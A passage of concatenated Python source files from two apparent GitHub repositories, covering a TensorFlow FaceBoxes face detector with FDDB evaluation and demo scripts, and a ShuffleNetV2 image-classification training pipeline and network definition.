def __call__(self, image, score_threshold=0.5):
"""Detect faces.
Arguments:
image: a numpy uint8 array with shape [height, width, 3],
that represents a RGB image.
score_threshold: a float number.
Returns:
boxes: a float numpy array of shape [num_faces, 5].
"""
image_fornet,scale_x,scale_y=self.preprocess(image,target_width=cfg.MODEL.win,target_height=cfg.MODEL.hin)
image_fornet = np.expand_dims(image_fornet, 0)
start=time.time()
res= self.model.inference(image_fornet)
print('xx',time.time()-start)
boxes=res['boxes'].numpy()
scores=res['scores'].numpy()
num_boxes=res['num_boxes'].numpy()
num_boxes = num_boxes[0]
boxes = boxes[0][:num_boxes]
scores = scores[0][:num_boxes]
to_keep = scores > score_threshold
boxes = boxes[to_keep]
scores = scores[to_keep]
###recorver to raw image
scaler = np.array([cfg.MODEL.hin/scale_y,
cfg.MODEL.win/scale_x,
cfg.MODEL.hin/scale_y,
cfg.MODEL.win/scale_x], dtype='float32')
boxes = boxes * scaler
scores=np.expand_dims(scores, 0).reshape([-1,1])
#####the tf.nms produce ymin,xmin,ymax,xmax, swap it in to xmin,ymin,xmax,ymax
for i in range(boxes.shape[0]):
boxes[i] = np.array([boxes[i][1], boxes[i][0], boxes[i][3],boxes[i][2]])
return np.concatenate([boxes, scores],axis=1)
def preprocess(self,image,target_height,target_width,label=None):
###sometimes use in objs detects
h,w,c=image.shape
bimage=np.zeros(shape=[target_height,target_width,c],dtype=image.dtype)+np.array(cfg.DATA.PIXEL_MEAN,dtype=image.dtype)
long_side=max(h,w)
scale_x=scale_y=target_height/long_side
image=cv2.resize(image, None,fx=scale_x,fy=scale_y)
h_,w_,_=image.shape
bimage[:h_, :w_, :] = image
return bimage,scale_x,scale_y
def init_model(self,*args):
if len(args) == 1:
use_pb = True
pb_path = args[0]
else:
use_pb = False
meta_path = args[0]
restore_model_path = args[1]
def ini_ckpt():
graph = tf.Graph()
graph.as_default()
configProto = tf.ConfigProto()
configProto.gpu_options.allow_growth = True
sess = tf.Session(config=configProto)
# load_model(model_path, sess)
saver = tf.train.import_meta_graph(meta_path)
saver.restore(sess, restore_model_path)
print("Model restred!")
return (graph, sess)
def init_pb(model_path):
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
compute_graph = tf.Graph()
compute_graph.as_default()
sess = tf.Session(config=config)
with tf.gfile.GFile(model_path, 'rb') as fid:
graph_def = tf.GraphDef()
graph_def.ParseFromString(fid.read())
tf.import_graph_def(graph_def, name='')
# saver = tf.train.Saver(tf.global_variables())
# saver.save(sess, save_path='./tmp.ckpt')
return (compute_graph, sess)
if use_pb:
model = init_pb(pb_path)
else:
model = ini_ckpt()
graph = model[0]
sess = model[1]
return graph, sess
```
#### File: faceboxes-tensorflow/test/fddb.py
```python
import sys
sys.path.append('.')
import numpy as np
import os
import cv2
from tqdm import tqdm
import argparse
from lib.core.api.face_detector import FaceDetector
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
ap = argparse.ArgumentParser()
ap.add_argument( "--model", required=True, default='', help="model to eval:")
ap.add_argument( "--is_show", required=False, default=False, help="show result or not?")
ap.add_argument( "--data_dir", required=False, default="./FDDB/img", help="dir to img")
ap.add_argument( "--split_dir", required=False,default='./FDDB/FDDB-folds',help="dir to FDDB-folds")
ap.add_argument( "--result", required=False,default='./result',help="dir to write result")
args = ap.parse_args()
IMAGES_DIR = args.data_dir
ANNOTATIONS_PATH = args.split_dir
RESULT_DIR = args.result
if not os.access(RESULT_DIR,os.F_OK):
os.mkdir(RESULT_DIR)
face_detector = FaceDetector(args.model)
annotations = [s for s in os.listdir(ANNOTATIONS_PATH) if s.endswith('ellipseList.txt')]
image_lists = [s for s in os.listdir(ANNOTATIONS_PATH) if not s.endswith('ellipseList.txt')]
annotations = sorted(annotations)
image_lists = sorted(image_lists)
images_to_use = []
for n in image_lists:
with open(os.path.join(ANNOTATIONS_PATH, n)) as f:
images_to_use.extend(f.readlines())
images_to_use = [s.strip() for s in images_to_use]
with open(os.path.join(RESULT_DIR, 'faceList.txt'), 'w') as f:
for p in images_to_use:
f.write(p + '\n')
ellipses = []
for n in annotations:
with open(os.path.join(ANNOTATIONS_PATH, n)) as f:
ellipses.extend(f.readlines())
i = 0
with open(os.path.join(RESULT_DIR, 'ellipseList.txt'), 'w') as f:
for p in ellipses:
# check image order
if 'big/img' in p:
assert images_to_use[i] in p
i += 1
f.write(p)
def bbox_vote(det):
order = det[:, 4].ravel().argsort()[::-1]
det = det[order, :]
while det.shape[0] > 0:
# IOU
area = (det[:, 2] - det[:, 0] + 1) * (det[:, 3] - det[:, 1] + 1)
xx1 = np.maximum(det[0, 0], det[:, 0])
yy1 = np.maximum(det[0, 1], det[:, 1])
xx2 = np.minimum(det[0, 2], det[:, 2])
yy2 = np.minimum(det[0, 3], det[:, 3])
w = np.maximum(0.0, xx2 - xx1 + 1)
h = np.maximum(0.0, yy2 - yy1 + 1)
inter = w * h
o = inter / (area[0] + area[:] - inter)
# get needed merge det and delete these det
merge_index = np.where(o >= 0.3)[0]
det_accu = det[merge_index, :]
det = np.delete(det, merge_index, 0)
if merge_index.shape[0] <= 1:
continue
det_accu[:, 0:4] = det_accu[:, 0:4] * np.tile(det_accu[:, -1:], (1, 4))
max_score = np.max(det_accu[:, 4])
det_accu_sum = np.zeros((1, 5))
det_accu_sum[:, 0:4] = np.sum(det_accu[:, 0:4], axis=0) / np.sum(det_accu[:, -1:])
det_accu_sum[:, 4] = max_score
try:
dets = np.row_stack((dets, det_accu_sum))
except:
dets = det_accu_sum
dets = dets[0:750, :]
return dets
predictions = []
for n in tqdm(images_to_use):
image_array = cv2.imread(os.path.join(IMAGES_DIR, n) + '.jpg')
image_array = cv2.cvtColor(image_array, cv2.COLOR_BGR2RGB)
# threshold is important to set low
boxes = face_detector(image_array, score_threshold=0.05)
flip_img=np.flip(image_array,1)
boxes_flip_ = face_detector(flip_img, score_threshold=0.05)
boxes_flip = np.zeros(boxes_flip_.shape)
boxes_flip[:, 0] = flip_img.shape[1] - boxes_flip_[:, 2]
boxes_flip[:, 1] = boxes_flip_[:, 1]
boxes_flip[:, 2] = flip_img.shape[1] - boxes_flip_[:, 0]
boxes_flip[:, 3] = boxes_flip_[:, 3]
boxes_flip[:, 4] = boxes_flip_[:, 4]
#####
det = np.row_stack((boxes,boxes_flip ))
dets = bbox_vote(det)
boxes=dets
#
# if args.is_show:
# for bbox in dets:
# if bbox[4] > 0.3:
# # cv2.circle(img_show,(p[0],p[1]),3,(0,0,213),-1)
# cv2.rectangle(image_array, (int(bbox[0]), int(bbox[1])),
# (int(bbox[2]), int(bbox[3])), (255, 0, 0), 7)
# cv2.imshow('tmp', image_array)
# cv2.waitKey(0)
###
predictions.append((n, boxes[:,0:4], boxes[:,4]))
with open(os.path.join(RESULT_DIR, 'detections.txt'), 'w') as f:
for n, boxes, scores in predictions:
f.write(n + '\n')
f.write(str(len(boxes)) + '\n')
for b, s in zip(boxes, scores):
xmin, ymin, xmax, ymax = b
h, w = int(ymax - ymin+1), int(xmax - xmin+1)
f.write('{0} {1} {2} {3} {4:.4f}\n'.format(int(xmin), int(ymin), w, h, s))
```
#### File: 610265158/faceboxes-tensorflow/vis.py
```python
import cv2
import os
import time
import argparse
from lib.core.api.face_detector import FaceDetector
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import os
def GetFileList(dir, fileList):
newDir = dir
if os.path.isfile(dir):
fileList.append(dir)
elif os.path.isdir(dir):
for s in os.listdir(dir):
# if s == "pts":
# continue
newDir=os.path.join(dir,s)
GetFileList(newDir, fileList)
return fileList
def image_demo(data_dir):
args.model
detector = FaceDetector(args.model)
count = 0
pics = []
GetFileList(data_dir,pics)
pics = [x for x in pics if 'jpg' in x or 'png' in x]
#pics.sort()
for pic in pics:
img=cv2.imread(pic)
img_show = img.copy()
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
star=time.time()
boxes=detector(img,0.3)
#print('one iamge cost %f s'%(time.time()-star))
#print(boxes.shape)
#print(boxes)
################toxml or json
print(boxes.shape[0])
if boxes.shape[0]==0:
print(pic)
for box_index in range(boxes.shape[0]):
bbox = boxes[box_index]
cv2.rectangle(img_show, (int(bbox[0]), int(bbox[1])),
(int(bbox[2]), int(bbox[3])), (255, 0, 0), 4)
# cv2.putText(img_show, str(bbox[4]), (int(bbox[0]), int(bbox[1]) + 30),
# cv2.FONT_HERSHEY_SIMPLEX, 1,
# (255, 0, 255), 2)
#
# cv2.putText(img_show, str(int(bbox[5])), (int(bbox[0]), int(bbox[1]) + 40),
# cv2.FONT_HERSHEY_SIMPLEX, 1,
# (0, 0, 255), 2)
cv2.namedWindow('res',0)
cv2.imshow('res',img_show)
cv2.waitKey(0)
print(count)
def video_demo(cam_id):
weights = args.model
detector = FaceDetector(weights)
vide_capture = cv2.VideoCapture(cam_id)
while 1:
ret, img = vide_capture.read()
img_show = img.copy()
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
boxes = detector(img, 0.5)
for box_index in range(boxes.shape[0]):
bbox = boxes[box_index]
cv2.rectangle(img_show, (int(bbox[0]), int(bbox[1])),
(int(bbox[2]), int(bbox[3])), (255, 0, 0), 4)
cv2.namedWindow('res', 0)
cv2.imshow('res', img_show)
key=cv2.waitKey(1)
if key==ord('q'):
break
if __name__=='__main__':
parser = argparse.ArgumentParser(description='Start train.')
parser.add_argument('--model', dest='model', type=str, default=None, \
help='the model to use')
parser.add_argument('--img_dir', dest='img_dir', type=str,default=None, \
help='the num of the classes (default: 100)')
parser.add_argument('--cam_id', dest='cam_id', type=int,default=0, \
help='the camre to use')
args = parser.parse_args()
if args.img_dir is not None:
image_demo(args.img_dir)
else:
video_demo(args.cam_id)
``` |
{
"source": "610265158/shufflenetv2-series-tensorflow",
"score": 3
} |
#### File: core/base_trainer/metric.py
```python
import numpy as np
from lib.helper.logger import logger
class Metric():
def __init__(self,batch_size):
self.batch_size=batch_size
self.top1_correct=0
self.top5_correct = 0
self.total=0
def update(self,top1_acc,top5_acc):
self.top1_correct+=round(top1_acc*self.batch_size)
self.top5_correct += round(top5_acc * self.batch_size)
self.total+=self.batch_size
def report(self):
## report
message=''
message+=('top1 acc:%.6f\n'%(self.top1_correct/self.total))
message+=('top5 acc:%.6f\n' % (self.top5_correct / self.total))
message+=('%d samples \n'%self.total)
logger.info(message)
self.top1_correct = 0
self.top5_correct = 0
self.total = 0
```
#### File: core/base_trainer/net_work.py
```python
import tensorflow as tf
import tensorflow.contrib.slim as slim
import time
import numpy as np
import cv2
from train_config import config as cfg
from lib.dataset.dataietr import DataIter
from lib.core.model.net.shufflenet.shufflenetv2plus import ShufflenetV2Plus
from lib.core.model.net.shufflenet.shufflenetv2 import ShufflenetV2
from lib.core.model.net.shufflenet.shufflenetv2_5x5 import ShuffleNetV2_5x5
from lib.helper.logger import logger
from lib.core.base_trainer.metric import Metric
class trainner():
def __init__(self):
self.train_ds=DataIter(cfg.DATA.root_path,cfg.DATA.train_txt_path,True)
self.val_ds = DataIter(cfg.DATA.root_path,cfg.DATA.val_txt_path,False)
self.inputs=[]
self.outputs=[]
self.val_outputs=[]
self.ite_num=1
self._graph=tf.Graph()
self.summaries = []
self.ema_weights = False
self.metric=Metric(cfg.TRAIN.batch_size)
self.train_dict={}
def get_opt(self):
with self._graph.as_default():
##set the opt there
global_step = tf.get_variable(
'global_step', [],
initializer=tf.constant_initializer(0), dtype=tf.int32, trainable=False)
# Decay the learning rate
if cfg.TRAIN.lr_decay == 'cos':
lr = tf.train.cosine_decay(
learning_rate=0.001, global_step=global_step, decay_steps=cfg.TRAIN.lr_decay_every_step[-1])
else:
lr = tf.train.piecewise_constant(global_step,
cfg.TRAIN.lr_decay_every_step,
cfg.TRAIN.lr_value_every_step
)
if cfg.TRAIN.opt=='Adam':
opt = tf.train.AdamOptimizer(lr)
else:
opt = tf.train.MomentumOptimizer(lr, momentum=0.9, use_nesterov=False)
if cfg.TRAIN.mix_precision:
opt = tf.train.experimental.enable_mixed_precision_graph_rewrite(opt)
return opt,lr,global_step
def load_weight(self):
with self._graph.as_default():
if cfg.MODEL.continue_train:
#########################restore the params
variables_restore = tf.get_collection(tf.GraphKeys.MODEL_VARIABLES)
print(variables_restore)
saver2 = tf.train.Saver(variables_restore)
saver2.restore(self._sess, cfg.MODEL.pretrained_model)
elif 'npy' in cfg.MODEL.pretrained_model:
params_dict=np.load(cfg.MODEL.pretrained_model,allow_pickle=True).item()
#########################restore the params
variables_restore = tf.get_collection(tf.GraphKeys.MODEL_VARIABLES, scope=cfg.MODEL.net_structure)
##filter
if cfg.MODEL.cls != 1000:
variables_restore = [x for x in variables_restore if 'classifier' not in x.name]
print(variables_restore)
for i,variables in enumerate(variables_restore):
logger.info('assign %s with np data'%(variables.name) )
self._sess.run(variables.assign( params_dict[variables.name]))
elif cfg.MODEL.pretrained_model is not None :
#########################restore the params
variables_restore = tf.get_collection(tf.GraphKeys.MODEL_VARIABLES, scope=cfg.MODEL.net_structure)
if cfg.MODEL.cls != 1000:
variables_restore=[x for x in variables_restore if 'classifier' not in x.name]
print(variables_restore)
saver2 = tf.train.Saver(variables_restore)
saver2.restore(self._sess, cfg.MODEL.pretrained_model)
else:
variables_restore = tf.get_collection(tf.GraphKeys.MODEL_VARIABLES, scope=cfg.MODEL.net_structure)
print(variables_restore)
logger.info('no pretrained model, train from sctrach')
# Build an initialization operation to run below.
def add_summary(self, event):
self.summaries.append(event)
def tower_loss(self, scope, images, labels, training):
"""Calculate the total loss on a single tower running the model.
Args:
scope: unique prefix string identifying the CIFAR tower, e.g. 'tower_0'
images: Images. 4D tensor of shape [batch_size, height, width, 3].
labels: Labels. 1D tensor of shape [batch_size].
Returns:
Tensor of shape [] containing the total loss for a batch of data
"""
# Build the portion of the Graph calculating the losses. Note that we will
# assemble the total_loss using a custom function below.
if 'ShuffleNetV2_Plus' ==cfg.MODEL.net_structure:
net = ShufflenetV2Plus
elif 'ShuffleNetV2' ==cfg.MODEL.net_structure:
net = ShufflenetV2
elif 'ShuffleNetV2_5x5' == cfg.MODEL.net_structure:
net = ShuffleNetV2_5x5
else:
raise NotImplementedError
logits = net(images,training,include_head=True)
mask=labels>=0
labels = labels[mask]
logits= logits[mask]
onehot_labels=tf.one_hot(labels,depth=cfg.MODEL.cls)
cls_loss=slim.losses.softmax_cross_entropy(logits=logits,onehot_labels=onehot_labels,label_smoothing=0.1)
predicts = tf.nn.softmax(logits=logits)
correct_prediction = tf.equal(tf.argmax(predicts, 1), labels)
top1_accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
top5_correct_prediction = tf.nn.in_top_k(logits, labels, k = 5)
top5_accuracy = tf.reduce_mean(tf.cast(top5_correct_prediction, "float"), name="top5_accuracy")
l2_loss = tf.add_n(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES), name='l2_loss')
### make loss and acc
return cls_loss,top1_accuracy,top5_accuracy, l2_loss
def average_gradients(self,tower_grads):
"""Calculate the average gradient for each shared variable across all towers.
Note that this function provides a synchronization point across all towers.
Args:
tower_grads: List of lists of (gradient, variable) tuples. The outer list
is over individual gradients. The inner list is over the gradient
calculation for each tower.
Returns:
List of pairs of (gradient, variable) where the gradient has been averaged
across all towers.
"""
average_grads = []
for grad_and_vars in zip(*tower_grads):
# Note that each grad_and_vars looks like the following:
# ((grad0_gpu0, var0_gpu0), ... , (grad0_gpuN, var0_gpuN))
grads = []
for g, _ in grad_and_vars:
# Add 0 dimension to the gradients to represent the tower.
try:
expanded_g = tf.expand_dims(g, 0)
except:
print(_)
# Append on a 'tower' dimension which we will average over below.
grads.append(expanded_g)
# Average over the 'tower' dimension.
grad = tf.concat(axis=0, values=grads)
grad = tf.reduce_mean(grad, 0)
# Keep in mind that the Variables are redundant because they are shared
# across towers. So .. we will just return the first tower's pointer to
# the Variable.
v = grad_and_vars[0][1]
grad_and_var = (grad, v)
average_grads.append(grad_and_var)
return average_grads
def build(self):
with self._graph.as_default(), tf.device('/cpu:0'):
# Create a variable to count the number of train() calls. This equals the
# number of batches processed * FLAGS.num_gpus.
# Create an optimizer that performs gradient descent.
opt, lr, global_step = self.get_opt()
training = tf.placeholder(tf.bool, name="training_flag")
images_place_holder_list = []
labels_place_holder_list = []
# Create an optimizer that performs gradient descent.
# Calculate the gradients for each model tower.
tower_grads = []
with tf.variable_scope(tf.get_variable_scope()):
for i in range(cfg.TRAIN.num_gpu):
with tf.device('/gpu:%d' % i):
with tf.name_scope('tower_%d' % (i)) as scope:
with slim.arg_scope([slim.model_variable, slim.variable], device='/cpu:0'):
images_ = tf.placeholder(tf.float32, [None, cfg.MODEL.hin, cfg.MODEL.win, 3],
name="images")
labels_ = tf.placeholder(tf.int64, [None], name="labels")
images_place_holder_list.append(images_)
labels_place_holder_list.append(labels_)
cls_loss,top1_accuracy,top5_accuracy, l2_loss = self.tower_loss(
scope, images_, labels_, training)
##use muti gpu ,large batch
if i == cfg.TRAIN.num_gpu - 1:
total_loss = tf.add_n([cls_loss, l2_loss])
else:
total_loss = tf.add_n([cls_loss])
# Reuse variables for the next tower.
tf.get_variable_scope().reuse_variables()
##when use batchnorm, updates operations only from the
## final tower. Ideally, we should grab the updates from all towers
# but these stats accumulate extremely fast so we can ignore the
# other stats from the other towers without significant detriment.
bn_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS, scope=scope)
# Retain the summaries from the final tower.
# summaries = tf.get_collection(tf.GraphKeys.SUMMARIES, scope)
summaries = tf.get_collection('%smutiloss' % scope, scope)
# Calculate the gradients for the batch of data on this CIFAR tower.
grads = opt.compute_gradients(total_loss)
# Keep track of the gradients across all towers.
tower_grads.append(grads)
# We must calculate the mean of each gradient. Note that this is the
# synchronization point across all towers.
grads = self.average_gradients(tower_grads)
# Add a summary to track the learning rate.
self.add_summary(tf.summary.scalar('learning_rate', lr))
self.add_summary(tf.summary.scalar('loss', cls_loss))
self.add_summary(tf.summary.scalar('acctop1', top1_accuracy))
self.add_summary(tf.summary.scalar('acctop5', top5_accuracy))
self.add_summary(tf.summary.scalar('l2_loss', l2_loss))
# Add histograms for gradients.
for grad, var in grads:
if grad is not None:
summaries.append(tf.summary.histogram(var.op.name + '/gradients', grad))
# Apply the gradients to adjust the shared variables.
apply_gradient_op = opt.apply_gradients(grads, global_step=global_step)
# Add histograms for trainable variables.
for var in tf.trainable_variables():
summaries.append(tf.summary.histogram(var.op.name, var))
if self.ema_weights:
# Track the moving averages of all trainable variables.
variable_averages = tf.train.ExponentialMovingAverage(
0.9, global_step)
variables_averages_op = variable_averages.apply(tf.trainable_variables())
# Group all updates to into a single train op.
train_op = tf.group(apply_gradient_op, variables_averages_op, *bn_update_ops)
else:
train_op = tf.group(apply_gradient_op, *bn_update_ops)
self.inputs = [images_place_holder_list, labels_place_holder_list, training]
self.outputs = [train_op, total_loss, cls_loss,top1_accuracy,top5_accuracy, l2_loss, lr]
self.val_outputs = [total_loss, cls_loss,top1_accuracy,top5_accuracy, l2_loss, lr]
# Create a saver.
# Build an initialization operation to run below.
init = tf.global_variables_initializer()
tf_config = tf.ConfigProto(
allow_soft_placement=True,
log_device_placement=False)
#tf_config.gpu_options.allow_growth = True
tf_config.graph_options.optimizer_options.global_jit_level = tf.OptimizerOptions.ON_1
tf_config.intra_op_parallelism_threads = 18
self._sess = tf.Session(config=tf_config)
self._sess.run(init)
def loop(self,):
self.build()
self.load_weight()
with self._graph.as_default():
# Create a saver.
self.saver = tf.train.Saver(tf.global_variables(), max_to_keep=None)
tmp_model_name = cfg.MODEL.model_path + '/cls_for_convert.ckpt'
logger.info('A tmp model saved as %s \n' % tmp_model_name)
self.saver.save(self._sess, save_path=tmp_model_name)
# Build the summary operation from the last tower summaries.
self.summary_op = tf.summary.merge(self.summaries)
self.summary_writer = tf.summary.FileWriter(cfg.MODEL.model_path, self._sess.graph)
min_loss_control=1000.
for epoch in range(cfg.TRAIN.epoch):
self._train(epoch)
val_loss=self._val(epoch)
logger.info('**************'
'val_loss %f '%(val_loss))
#tmp_model_name=cfg.MODEL.model_path + \
# 'epoch_' + str(epoch ) + \
# 'L2_' + str(cfg.TRAIN.weight_decay_factor) + \
# '.ckpt'
#logger.info('save model as %s \n'%tmp_model_name)
#self.saver.save(self.sess, save_path=tmp_model_name)
if 1:
min_loss_control=val_loss
low_loss_model_name = cfg.MODEL.model_path + \
'epoch_' + str(epoch) + \
'L2_' + str(cfg.TRAIN.weight_decay_factor) + '.ckpt'
logger.info('A new low loss model saved as %s \n' % low_loss_model_name)
self.saver.save(self._sess, save_path=low_loss_model_name)
self._sess.close()
def _train(self,_epoch):
for step in range(cfg.TRAIN.iter_num_per_epoch):
self.ite_num += 1
start_time = time.time()
example_images, example_labels = next(self.train_ds)
########show_flag check the data
if cfg.TRAIN.vis:
for i in range(cfg.TRAIN.batch_size):
example_image = example_images[i, :, :, :]
example_label = example_labels[i]
print(example_label)
cv2.namedWindow('img', 0)
cv2.imshow('img', example_image.astype(np.uint8))
cv2.waitKey(0)
fetch_duration = time.time() - start_time
for n in range(cfg.TRAIN.num_gpu):
self.train_dict[self.inputs[0][n]] = example_images[n * cfg.TRAIN.batch_size:(n + 1) * cfg.TRAIN.batch_size, :,:,:]
self.train_dict[self.inputs[1][n]] = example_labels[n * cfg.TRAIN.batch_size:(n + 1) * cfg.TRAIN.batch_size]
self.train_dict[self.inputs[2]] = True
_, total_loss_value, loss_value, top1_acc_value, top5_acc_value, l2_loss_value, learn_rate, = \
self._sess.run([*self.outputs],
feed_dict=self.train_dict)
duration = time.time() - start_time
run_duration = duration - fetch_duration
if self.ite_num % cfg.TRAIN.log_interval == 0:
num_examples_per_step = cfg.TRAIN.batch_size * cfg.TRAIN.num_gpu
examples_per_sec = num_examples_per_step / duration
sec_per_batch = duration / cfg.TRAIN.num_gpu
format_str = ('epoch %d: iter %d, '
'total_loss=%.6f '
'loss=%.6f '
'top1 acc=%.6f '
'top5 acc=%.6f '
'l2_loss=%.6f '
'learn_rate =%e '
'(%.1f examples/sec; %.3f sec/batch) '
'fetch data time = %.6f'
'run time = %.6f')
logger.info(format_str % (_epoch,
self.ite_num,
total_loss_value,
loss_value,
top1_acc_value,
top5_acc_value,
l2_loss_value,
learn_rate,
examples_per_sec,
sec_per_batch,
fetch_duration,
run_duration))
# if self.ite_num % 100 == 0:
# summary_str = self._sess.run(self.summary_op, feed_dict=self.train_dict)
# self.summary_writer.add_summary(summary_str, self.ite_num)
def _val(self,_epoch):
all_total_loss=0
for step in range(cfg.TRAIN.val_iter):
example_images, example_labels = next(self.val_ds) # 在会话中取出image和label
feed_dict = {}
for n in range(cfg.TRAIN.num_gpu):
feed_dict[self.inputs[0][n]] = example_images[n * cfg.TRAIN.batch_size:(n + 1) * cfg.TRAIN.batch_size, :,:,:]
feed_dict[self.inputs[1][n]] = example_labels[n * cfg.TRAIN.batch_size:(n + 1) * cfg.TRAIN.batch_size]
feed_dict[self.inputs[2]] = False
total_loss_value, loss_value, top1_acc_value, top5_acc_value, l2_loss_value, learn_rate = \
self._sess.run([*self.val_outputs],
feed_dict=feed_dict)
all_total_loss+=total_loss_value-l2_loss_value
self.metric.update(top1_acc_value,top5_acc_value)
self.metric.report()
return all_total_loss/cfg.TRAIN.val_iter
def train(self):
self.loop()
```
#### File: net/shufflenet/shufflenetv2plus.py
```python
import tensorflow as tf
import tensorflow.contrib.slim as slim
from train_config import config as cfg
from lib.core.model.net.mobilenetv3.mobilnet_v3 import hard_swish
def torch_style_padding(inputs,kernel_size,rate=1):
'''
by default tensorflow use different padding method with pytorch,
so we need do explicit padding before we do conv or pool
:param inputs:
:param kernel_size:
:param rate:
:return:
'''
kernel_size_effective = kernel_size + (kernel_size - 1) * (rate - 1)
pad_total = kernel_size_effective - 1
pad_beg = pad_total // 2
pad_end = pad_total - pad_beg
inputs = tf.pad(inputs,
[[0, 0], [pad_beg, pad_end], [pad_beg, pad_end], [0, 0]])
return inputs
def se(fm,input_dim,scope='really_boring'):
se=tf.reduce_mean(fm,axis=[1,2],keep_dims=True)
with tf.variable_scope(scope):
se = slim.conv2d(se,
input_dim//4,
[1, 1],
stride=1,
activation_fn=tf.nn.relu,
biases_initializer=None,
normalizer_fn=slim.batch_norm,
scope='SE_opr/1')
se = slim.conv2d(se,
input_dim,
[1, 1],
stride=1,
activation_fn=None,
normalizer_fn=None,
biases_initializer=None,
scope='SE_opr/4')
se=tf.nn.relu6(se+3.)/6.
return fm*se
def shuffle(z):
# with tf.name_scope('shuffle_split'):
# shape = tf.shape(z)
# batch_size = shape[0]
# height, width = z.shape[1].value, z.shape[2].value
#
# depth = z.shape[3].value
#
# if cfg.MODEL.deployee:
# z = tf.reshape(z, [ height, width, 2, depth//2]) # shape [batch_size, height, width, 2, depth]
#
# z = tf.transpose(z, [0, 1, 3, 2])
#
# else:
# z = tf.reshape(z, [batch_size, height, width, 2, depth//2])# shape [batch_size, height, width, 2, depth]
#
# z = tf.transpose(z, [0, 1, 2, 4, 3])
#
# z = tf.reshape(z, [batch_size, height, width, depth])
# x, y = tf.split(z, num_or_size_splits=2, axis=3)
# return x, y
with tf.name_scope('shuffle_split'):
z=tf.transpose(z,perm=[0,3,1,2])
shape = tf.shape(z)
batch_size = shape[0]
height, width = z.shape[2].value, z.shape[3].value
depth = z.shape[1].value
if cfg.MODEL.deployee:
z = tf.reshape(z,[batch_size * depth // 2, 2, height * width]) # shape [batch_size, height, width, 2, depth]
z = tf.transpose(z, [1, 0, 2])
z = tf.reshape(z, [batch_size*2, depth // 2, height, width])
z = tf.transpose(z, perm=[0, 2, 3, 1])
x, y = tf.split(z, num_or_size_splits=2, axis=0)
else:
z = tf.reshape(z, [batch_size*depth//2,2, height* width])# shape [batch_size, height, width, 2, depth]
z = tf.transpose(z, [1,0,2])
z = tf.reshape(z, [batch_size*2, depth // 2, height , width])
z = tf.transpose(z, perm=[0, 2, 3, 1])
x, y = tf.split(z, num_or_size_splits=2, axis=0)
return x, y
def shufflenet(old_x,inp, oup, base_mid_channels, ksize, stride, activation, useSE,scope_index=0):
main_scope_list=[['0','3','5'],
['0', '3', '5'],
None,
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
None,
['0', '3', '5'],
]
project_scope_list=[['0','2'],
None,
None,
None,
['0', '2'],
None,
None,
None,
['0', '2'],
None,
None, #10
None,
None,
None,
None,
None,
['0', '2'], #16
None,
None,
None,
]
se_scope_list=[None,
None,
None,
None,
None,
None,
None,
None,
['8'],
['8'],
['8'],
['8'],
['8'],
['8'],
['8'],
['8'],
['8'],
['8'],
None,
['8'],
]
print('excuted here')
main_scope=main_scope_list[scope_index]
project_scope = project_scope_list[scope_index]
se_scope=se_scope_list[scope_index]
if stride==1:
x_proj, x = shuffle(old_x)
else:
x_proj = old_x
x = old_x
base_mid_channel = base_mid_channels
outputs = oup - inp
if activation == 'ReLU':
act_func=tf.nn.relu
else:
act_func = hard_swish
##branch main
x = slim.conv2d(x,
base_mid_channel,
[1, 1],
stride=1,
padding='VALID',
activation_fn=act_func,
normalizer_fn=slim.batch_norm,
biases_initializer=None,
scope='branch_main/'+main_scope[0])
x = torch_style_padding(x, ksize)
x = slim.separable_conv2d(x,
num_outputs=None,
kernel_size=[ksize, ksize],
stride=stride,
padding='VALID',
activation_fn=None,
normalizer_fn=slim.batch_norm,
scope='branch_main/'+main_scope[1])
x = slim.conv2d(x,
num_outputs=outputs,
kernel_size=[1, 1],
stride=1,
padding='VALID',
activation_fn=act_func,
normalizer_fn=slim.batch_norm,
scope='branch_main/'+main_scope[2])
if useSE and activation != 'ReLU':
x=se(x,outputs,scope='branch_main/'+se_scope[0])
if stride == 2:
x_proj = torch_style_padding(x_proj, ksize)
x_proj = slim.separable_conv2d(x_proj,
num_outputs=None,
kernel_size=[ksize, ksize],
stride=stride,
padding='VALID',
activation_fn=None,
normalizer_fn=slim.batch_norm,
scope='branch_proj/'+project_scope[0])
x_proj = slim.conv2d(x_proj,
num_outputs=inp,
kernel_size=[1, 1],
stride=1,
padding='VALID',
activation_fn=act_func,
normalizer_fn=slim.batch_norm,
scope='branch_proj/'+project_scope[1])
res=tf.concat([x_proj,x],axis=3)
return res
def shufflenet_xception(old_x,inp, oup, base_mid_channels, stride, activation, useSE,scope_index=0):
main_scope_list = [None,
None,
['0', '2', '5','7','10','12'],
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
['0', '2', '5','7','10','12'],
]
project_scope_list = [None,
None,
['0', '2'],
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
]
se_scope_list = [None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
['15'],
]
main_scope = main_scope_list[scope_index]
project_scope = project_scope_list[scope_index]
se_scope = se_scope_list[scope_index]
print(se_scope)
print(scope_index)
if stride == 1:
x_proj, x = shuffle(old_x)
else:
x_proj = old_x
x = old_x
base_mid_channel = base_mid_channels
outputs = oup - inp
if activation == 'ReLU':
act_func=tf.nn.relu
else:
act_func = hard_swish
##branch main
x = torch_style_padding(x, 3)
x = slim.separable_conv2d(x,
num_outputs=None,
kernel_size=[3, 3],
stride=stride,
padding='VALID',
activation_fn=None,
normalizer_fn=slim.batch_norm,
scope='branch_main/'+main_scope[0])
x = slim.conv2d(x,
base_mid_channel,
[1, 1],
stride=1,
padding='VALID',
activation_fn=act_func,
normalizer_fn=slim.batch_norm,
scope='branch_main/'+main_scope[1])
x = torch_style_padding(x, 3)
